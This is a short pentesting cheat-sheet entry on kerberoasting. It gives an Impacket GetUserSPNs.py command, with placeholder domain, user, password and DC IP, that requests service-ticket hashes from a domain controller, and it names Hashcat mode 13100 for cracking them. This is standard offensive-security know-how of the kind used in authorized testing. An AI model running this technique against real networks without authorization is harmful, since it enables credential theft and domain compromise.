Impacket can identify kerberoastable accounts and dump packets remotely. It comes standard with Kali Linux.
GetUserSPNs.py ${DOMAIN}/${USER}:${PASSWORD} \
-dc-ip $DOMAIN_CONTROLLER_IP -requestThe password hashes output here can then be cracked with Hashcat (use the 13100 hash mode).